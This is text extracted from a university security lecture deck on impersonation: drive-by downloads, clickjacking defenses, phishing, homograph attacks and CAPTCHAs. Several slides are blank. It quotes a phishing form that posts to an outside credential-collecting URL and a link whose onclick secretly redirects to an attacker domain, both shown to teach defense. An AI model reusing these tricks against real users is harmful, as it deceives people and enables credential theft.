Impersonation CS 161: Computer Security Prof. Vern Paxson TAs: - - PowerPoint PPT Presentation

impersonation
SMART_READER_LITE
LIVE PREVIEW

Impersonation CS 161: Computer Security Prof. Vern Paxson TAs: - - PowerPoint PPT Presentation

Impersonation CS 161: Computer Security Prof. Vern Paxson TAs: Jethro Beekman, Mobin Javed, Antonio Lupher, Paul Pearce & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ March 5, 2013 Goals For Today Web driveby


slide-1
SLIDE 1

Impersonation

CS 161: Computer Security

  • Prof. Vern Paxson

TAs: Jethro Beekman, Mobin Javed, Antonio Lupher, Paul Pearce & Matthias Vallentin

http://inst.eecs.berkeley.edu/~cs161/

March 5, 2013

slide-2
SLIDE 2

Goals For Today

  • Web “driveby” attacks
  • A broad look at the problem of impersonation

– Users not interacting with what they think they are

  • Clickjacking
  • Phishing
  • Other deceptive frauds

– Servers attempting to tell “Is this ‘user’ really a human?”

  • CAPTCHAs
  • With an emphasis on conceptual defenses
slide-3
SLIDE 3

<title>Javascript demo page</title> <font size=30> Hello, <b> <script> var a = 1; var b = 2; document.write("world: ", a+b, "</b>"); </script>

Or what else?

Dynamic Web Pages

  • Rather than static HTML, web pages can be

expressed as a program, say written in Javascript:

Threats?

Or what else? Java, Flash, Active-X, PDF …

slide-4
SLIDE 4

Drive-By Downloads

Drive-By download = attack that infects your system just by you visiting a (malicious) web page. Your are now 0wnd!

slide-5
SLIDE 5
slide-6
SLIDE 6
slide-7
SLIDE 7
slide-8
SLIDE 8
slide-9
SLIDE 9
slide-10
SLIDE 10
slide-11
SLIDE 11
slide-12
SLIDE 12

Defenses Against Driveby Attacks

  • Sandboxing: rich content (PDF, Flash, …) runs in

a constrained environment

– Implements Least Privilege

  • Disable unneeded functionality

– Excessive featurism kills! – But not always practical

  • Patching / autoupdate

– Still a race, and can be disruptive

  • Control exposure to untrusted sites

– E.g., Google Safe Browsing: dynamically updated list

  • f malware & phishing sites

– Browser warns on any access …

slide-13
SLIDE 13

Misleading Users

  • Browser assumes clicks & keystrokes = clear

indication of what the user wants to do

– Constitutes part of the user’s trusted path

  • Attacker can meddle with integrity of this

relationship in all sorts of ways …

slide-14
SLIDE 14
slide-15
SLIDE 15

Stealing Keystrokes (demo)

slide-16
SLIDE 16

Misleading Users

  • Browser assumes clicks & keystrokes = clear

indication of what the user wants to do

– Constitutes part of the user’s trusted path

  • Attacker can meddle with integrity of this

relationship in all sorts of ways …

  • Especially, recall the power of Javascript!

– Alter page contents (dynamically) – Track events (mouse clicks, motion, keystrokes) – Read/set cookies – Issue web requests, read replies

slide-17
SLIDE 17

From Clickjacking: Attacks and Defenses, by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

Using JS to Steal Facebook Likes

  • Bait-and-switch
  • Note: many of these attacks are similar to

TOCTTOU (Time of Check to Time of Use) vulnerabilities

Claim your FREE iPad

slide-18
SLIDE 18

From Clickjacking: Attacks and Defenses, by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

UI Subversion: Clickjacking

  • An attack application (script) compromises the context

integrity of another application’s User Interface when the user acts on the UI

  • 1. Target checked
  • 2. Initiate

click

  • 3. Target clicked

Temporal integrity

Targetclicked = Targetchecked Pointerclicked = Pointerchecked

Visual integrity

Target is visible Pointer is visible

Context integrity consists of visual integrity + temporal integrity

slide-19
SLIDE 19

From Clickjacking: Attacks and Defenses, by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

Compromise visual integrity – target

  • Hiding the target
  • Partial overlays

Click

$0.15 $0.15

slide-20
SLIDE 20

From Clickjacking: Attacks and Defenses, by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

Claim your FREE iPad

Compromise visual integrity – pointer

  • Manipulating cursor feedback
slide-21
SLIDE 21

From Clickjacking: Attacks and Defenses, by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

Clickjacking to Access the User’s Webcam

Fake cursor

Real cursor

slide-22
SLIDE 22

Some Clickjacking Defenses

  • Require confirmation for actions (annoys users)
  • Frame-busting: Web site ensures that its

“vulnerable” pages can’t be included as a frame inside another browser frame

– So user can’t be looking at it with something invisible

  • verlaid on top …

– … nor have the site invisible above something else

slide-23
SLIDE 23

Attacker implements this by placing Twitter’s page in a “Frame” inside their own page. Otherwise they wouldn’t overlap.

slide-24
SLIDE 24

Some Clickjacking Defenses

  • Require confirmation for actions (annoys users)
  • Frame-busting: Web site ensures that its

“vulnerable” pages can’t be included as a frame inside another browser frame

– So user can’t be looking at it with something invisible

  • verlaid on top …

– … nor have the site invisible above something else

  • Conceptually implemented with Javascript like:

if ¡(top.location ¡!= ¡self.location) ¡ ¡ ¡ ¡top.location ¡= ¡self.location; (Note: actually quite tricky to get this right!)

  • Current research considers more general approach …
slide-25
SLIDE 25

From Clickjacking: Attacks and Defenses, by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

InContext Defense (Research)

  • A set of techniques to ensure context integrity

for user actions

  • Server opt-in approach

– Let websites indicate their sensitive UIs – Let browsers enforce context integrity when users act on the sensitive UIs

attacker.com

slide-26
SLIDE 26

From Clickjacking: Attacks and Defenses, by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

Ensuring visual integrity of pointer

  • Remove cursor customization

– Attack success: 43% -> 16%

slide-27
SLIDE 27

From Clickjacking: Attacks and Defenses, by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

Ensuring visual integrity of pointer

  • Freeze screen around target on pointer entry

– Attack success: 43% -> 15% – Attack success (margin=10px): 12% – Attack success (margin=20px): 4% (baseline:5%)

Margin=10px Margin=20px

slide-28
SLIDE 28

From Clickjacking: Attacks and Defenses, by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

Ensuring visual integrity of pointer

  • Lightbox effect around target on pointer entry

– Attack success (Freezing + lightbox): 2%

slide-29
SLIDE 29

From Clickjacking: Attacks and Defenses, by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

  • UI delay: after visual changes on target or

pointer, invalidate clicks for X ms

– Attack success (delay=250ms): 47% -> 2% (2/91) – Attack success (delay=500ms): 1% (1/89)

Enforcing temporal integrity

slide-30
SLIDE 30

From Clickjacking: Attacks and Defenses, by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

Enforcing temporal integrity

  • Pointer re-entry: after visual changes on

target, invalidate clicks until pointer re-enters target

– Attack success: 0% (0/88)

30

slide-31
SLIDE 31

Other Forms of UI Sneakiness

  • Along with stealing events, attackers can

use power of Javascript customization / dynamic changes to mess with the userʼs mind …

  • For example, the user may not be paying

sufficient attention ... (demo)

– Tabnabbing

  • Or they might find themselves living in

The Matrix …

slide-32
SLIDE 32

“Browser in Browser”

Apparent browser is just a fully interactive image generated by Javascript running in real browser!

slide-33
SLIDE 33

5 Minute Break

Questions Before We Proceed?

slide-34
SLIDE 34

Phishing

slide-35
SLIDE 35

<form ¡action="http://bit.bg/a/paypal.php" method="post" ¡name=Date>

slide-36
SLIDE 36
slide-37
SLIDE 37
slide-38
SLIDE 38
slide-39
SLIDE 39
slide-40
SLIDE 40
slide-41
SLIDE 41
slide-42
SLIDE 42

The Problem of Phishing

  • Arises due to mismatch between reality & user’s:

– Perception of how to assess legitimacy – Mental model of what attackers can control

  • Both Email and Web
  • Coupled with:

– Deficiencies in how web sites authenticate

  • In particular, “replayable” authentication that is vulnerable to

theft

  • How can we tell when weʼre being phished?
slide-43
SLIDE 43
slide-44
SLIDE 44
slide-45
SLIDE 45

Check ¡the ¡URL ¡before ¡clicking?

<a ¡href="http://www.ebay.com/" ¡ ¡ ¡onclick="location='http://hackrz.com/'">

slide-46
SLIDE 46
slide-47
SLIDE 47

Exploits a misfeature in IE that interprets a number here as a 32-bit IP address

slide-48
SLIDE 48

Check ¡the ¡URL ¡in ¡address ¡bar?

slide-49
SLIDE 49
slide-50
SLIDE 50
slide-51
SLIDE 51

Homograph Attacks

  • International domain names can use international

character set

– E.g., Chinese contains characters that look like / . ? =

  • Attack: Legitimately register var.cn …
  • … buy legitimate set of HTTPS certificates for it …
  • … and then create a subdomain:

www.pnc.com⁄webapp⁄unsec⁄homepage.var.cn

slide-52
SLIDE 52

Check for padlock?

slide-53
SLIDE 53
slide-54
SLIDE 54

Add ¡a ¡clever ¡.favicon ¡with ¡a ¡picture ¡of ¡a ¡padlock

slide-55
SLIDE 55

Check for “green glow” in address bar?

slide-56
SLIDE 56

Check for everything?

slide-57
SLIDE 57

“Browser in Browser”

slide-58
SLIDE 58

“Spear Phishing”

Targeted phishing that includes details that seemingly must mean it’s legitimate

slide-59
SLIDE 59

Yep, this is itself a spear-phishing attack!

slide-60
SLIDE 60

Sophisticated phishing

  • Context-aware phishing – 10% users fooled

– Spoofed email includes info related to a recent eBay transaction/listing/purchase

  • Social phishing – 70% users fooled

– Send spoofed email appearing to be from one of the victim’s friends (inferred using social networks)

  • West Point experiment

– Cadets received a spoofed email near end of semester: “There was a problem with your last grade report; click here to resolve it.” 80% clicked.

slide-61
SLIDE 61

Why ¡does ¡phishing ¡work?

  • Because ¡users ¡are ¡stupid?
slide-62
SLIDE 62

Why does phishing work?

  • User mental model vs. reality

– Browser security model too hard to understand!

  • The easy path is insecure; the secure path takes

extra effort

  • Risks are rare
  • Users tend not to suspect malice; they find benign

interpretations and have been acclimated to failure

  • Psychology: people prefer to gamble for a chance
  • f no loss than a sure loss
slide-63
SLIDE 63

CAPTCHAs

slide-64
SLIDE 64
slide-65
SLIDE 65

CAPTCHAs

  • Reverse Turing Test: present “user” a

challenge that’s easy for a human to solve, hard for a program to solve

  • One common approach: distorted text

that’s difficult for character-recognition algorithms to decipher

slide-66
SLIDE 66

Problems?

slide-67
SLIDE 67
slide-68
SLIDE 68

Issues with CAPTCHAs

  • Inevitable arms race: as solving algorithms get

better, defense erodes, or gets harder for humans

slide-69
SLIDE 69
slide-70
SLIDE 70

Issues with CAPTCHAs

  • Inevitable arms race: as solving algorithms get

better, defense erodes, or gets harder for humans

  • Accessibility: not all humans can see!
  • Granularity: not all bots are bad! (e.g.,

crawlers)

slide-71
SLIDE 71

Issues with CAPTCHAs, con’t

  • If generating a CAPTCHA is somewhat

expensive, the mechanism itself is a DoS vulnerability

slide-72
SLIDE 72
slide-73
SLIDE 73

Issues with CAPTCHAs, con’t

  • If generating a CAPTCHA is somewhat

expensive, the mechanism itself is a DoS vulnerability

  • Final problem: CAPTCHAs are inherently

vulnerable to outsourcing attacks

– Attacker gets real humans to solve them

slide-74
SLIDE 74
slide-75
SLIDE 75
slide-76
SLIDE 76